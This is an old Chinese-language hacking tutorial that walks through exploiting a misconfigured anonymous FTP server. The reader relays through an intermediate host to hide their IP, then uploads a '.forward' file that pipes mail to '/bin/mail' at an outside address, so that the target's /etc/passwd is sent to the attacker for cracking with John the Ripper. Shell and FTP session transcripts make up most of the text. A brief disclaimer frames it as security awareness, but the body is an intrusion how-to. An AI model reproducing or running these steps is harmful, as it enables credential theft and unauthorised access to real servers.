匿 名 ftp 的 漏 洞

匿 名 ftp 的 漏 洞 匿 名 FTP 的 漏 洞 Love-gone 著 [前言] 对于著作这份文章的目的并不是在于教育，因为个人觉得台湾的网路虽然已经有所发展了，但是对于网路安全的重要性却是漠不关心，或者是没有足够的知识，这是相当危险的一个现象..就算是大专院校、政府机构、公司行号...甚至是网路业者、ISP对于网路安全和系统管理的正确观念和态度实在是相当缺乏。所以说不定在往后的日子里，只要一台pc和一台数据机，就可以让整个台湾网路崩溃....甚至是引起经济危机～就像是一个小孩子拿著一把枪在路上逛一样...Too Bad～～所以我写这篇文章纯粹是为了台湾网路安全而写的。并不希望有人因为这篇文章而去做违法的事情~~尤其是破坏别人的系统或是档案～当然啦，如果有人因此做了违法的事情，本人概不负责～ "水能载舟也覆舟"....只是告诉你骇客是如何入侵你的系统。 好像说要做F&Q..如果位对于网路系统安全有问题的可以写信来问我!!当然我也不是GOD不是说每一个问题我一定会~~但是我会尽力回答每一个人的问题,并不会说不知道就假装没看到这个问题,ok? [主题] 匿名FTP的漏洞 (Anonymous FTP) [困难度] 普通 [说明] 目前有很多的主机都有提供匿名FTP的服务,而方便和安全性却是鱼与熊掌不能两得的!!就像我以前说的,现在的系统管理员大多数都是缺少专业观念的!!!对于FTP也是一样,很多系统管理员都为了避免麻烦就用系统的预设设定来提供FTP这个服务.而anonymous ftp却是有许多漏洞须要我们去探讨的. 哇~~今天说话的口气怎么变得好专业阿!! [开始] 今天就先说明一下台湾目前anonymous ftp最常犯的错误!然而这些错误却常常是系统安全的大漏洞. 一开始先说明怎么把整个/etc/passwd抓回来.再说明如何任意的不用密码就能进入系统. 如果ftp的根目录是可以写入的或是可以执行程式.那你就可以把系统的/etc/passwd给抓回 来了!!方法就是先做一个传送档 .forward,然后ftp到主机上用anonymous进入.把你做的.forward 上传到它的根目录下.确定上传完毕后就可以离开了!在寄一封e-mail给那个主机的anonymous的帐号..大多帐号是ftp!然后你就可以去收收你的信箱了..什么还不懂阿?意思就是说/etc/passwd已经传到你的信箱了啦!赶快存好,拿约翰出来跑路吧!! 其方法说明如下: SunOS 5.6 login: lovegone Password: Last login: Sat May 16 19:07:41 from 11.22.203.122 tcsh: getwd: Cannot open directory "../" (Permission denied) tcsh: Trying to start from "/home/judge4" Sun Microsystems Inc. SunOS 5.6 Generic August 1997 Copyright by Andrew Chen 98/01/07 You have new mail. # (嘿嘿..先连到我的中间伺服器! 有人问说[一定要先有一个主机来当中间伺服器才能hack别人的主机吗?].当然不是这个意思啦!先连上中间伺服器只是要用来掩饰自己的ip嘛!而且可以利用中间伺服器来使用Net-Man2所说的那些"中间动作"阿!!所以中间伺服器不是说一定要用,但是却是很重要喔..) # finger @www.fuck.com.tw [cc.fuck.com.tw] Login Name TTY Idle When Where root Super-User console 10: Tue 09:05 :0 (没人在家...真好) # ftp www.fuck.com.tw Connected to cc.fuck.com.tw. 220 cc FTP server (Version wu-2.4(1) Thu May 30 18:00:41 CST 1996) ready. Name (www.fuck.com.tw:lovegone): anonymous (或是ftp,只要先匿名进去就好了) 331 Guest login ok, send your complete e-mail address as password. Password: 230- 230- ###### ##### ##### 230- # # # # 230- ##### # # # 230- # # ##### 230- # # # 230- # # # 230- 230- **** 欢迎到fuck烂公司 **** 230- 230- IE40 : pub/ie40 : 正式版.非抢鲜版 230- pub/ie40zip: ie40 zip. 230- 230 Guest login ok, access restrictions apply.Remote system type is UNIX. Using binary mode to transfer files. ftp> (不愧是fuck烂公司.连ftp也都是wu-2.4的..漏洞大的"狠") ftp> pwd 257 "/" is current directory. (看一下自己在那里,因为有些ftp会一开始就在帐号的工作目录下.我们要确保是在根目录下!如果不是在根目录下的人就用cd ..就可以到根目录了) ftp> ls (看根目录的设定) 200 PORT command successful. 150 Opening ASCII mode data connection for /bin/ls. total 18 drwxr-xr-x 7 fuck Taiwan 512 Oct 16 1997 . drwxr-xr-x 7 fuck Taiwan 512 Oct 16 1997 .. lrwxrwxrwx 1 fuck Taiwan 7 Jun 17 1997 bin -> usr/bin dr-xr-xr-x 2 fuck Taiwan 512 May 31 1996 dev d--x--x--x 2 fuck Taiwan 512 May 31 1996 etc dr-xr-xr-x 15 ftp Taiwan 512 Feb 13 03:40 pub drwxr-xr-x 2 ftp Taiwan 512 Apr 13 05:59 upload drwxr-xr-x 5 fuck Taiwan 512 May 31 1996 usr -rw-r--r-- 1 fuck Taiwan 488 Oct 8 1997 welcome.msg 226 Transfer complete. ("狠"好!根目录是drwxr-xr-x 可以执行程式.赶快去做一个.forward吧!!!) ftp> bye Goodbye! # echo "|/bin/mail Lovegone@ms7.accmail.com.tw" > shit (用echo和输出导向就可以了..) # ls -la total 26 drwxr-xr-x 4 lovegone users 1024 May 14 13:56 ./ drwxr-xr-x 47 root root 1024 Nov 26 14:08 ../ -rw-r--r-- 1 lovegone users 2217 May 14 13:56 .bash_history -rw-r--r-- 1 lovegone users 164 Jun 10 1996 .kermrc -rw-r--r-- 1 lovegone users 34 Jun 7 1993 .less -rw-r--r-- 1 lovegone users 114 Nov 24 1993 .lessrc drwxr-xr-x 2 lovegone users 1024 Jun 10 1996 .term/ -rw-rw-r-- 1 lovegone users 6116 May 7 1997 m-2.gif -rw------- 1 lovegone users 9382 May 14 13:49 mbox drwxr-xr-x 8 lovegone users 1024 Jul 28 1997 public_html/ -rw-r--r-- 1 lovegonw users 8 Jul 5 1998 shit (ok了!!接下来就是把shit上传到www.fuck.com.tw上当.forward) # ftp www.fuck.com.tw Connected to cc.fuck.com.tw. 220 cc FTP server (Version wu-2.4(1) Thu May 30 18:00:41 CST 1996) ready. Name (www.fuck.com.tw:lovegone): anonymous (或是ftp,只要先匿名进去就好了) 331 Guest login ok, send your complete e-mail address as password. Password: 230- 230- ###### ##### ##### 230- # # # # 230- ##### # # # 230- # # ##### 230- # # # 230- # # # 230- 230- **** 欢迎到fuck烂公司 **** 230- 230非抢鲜版 - IE40 : pub/ie40 : 正式版. 230- pub/ie40zip: ie40 zip. 230- 230 Guest login ok, access restrictions apply. Remote system type is UNIX. Using binary mode to transfer files. ftp> put shit .forward (上传记得要改成 .forward才行,别在用shit) 200 PORT command successful. 226 Transfer complete. ftp> bye Goodbye! (寄一封信给anonymous这个帐号..然后去收收你的信箱吧!) [Love-gone的话] 想不到竟然只说了利用 .forward来传/etc/passwd的方法!至于任意进出系统而不用密码的方法就只好等下次再说了...别说我又偷懒了! 最近都没有继续的写文章了,必竟hack只是兴趣而已!而生活中却有很多事要做..好累人 :-( 虽然hack只是兴趣,但是love-gone却是很认真的哟 !! love-gone希望以后能够从事跟电脑相关的工作,但是台湾的填鸭式教育却让love-gone很吃力 :-( 希望love-gone还是能有空来帮喜欢hack的朋友写文章或回答问题 :-) [感言] 还是老话一句...系统漏洞大都都是人为的疏失!!这是很重要的一点,希望是系统管理员的读者看到这文章能有所改进. Love-gone的E-mail信箱: lovegone@ms7.accmail.com.tw Love-gone的ICQ#: 12294548 这份文章的著作权是属于Love-gone所有.禁止任何人未经许可擅自破坏其文章的完整性.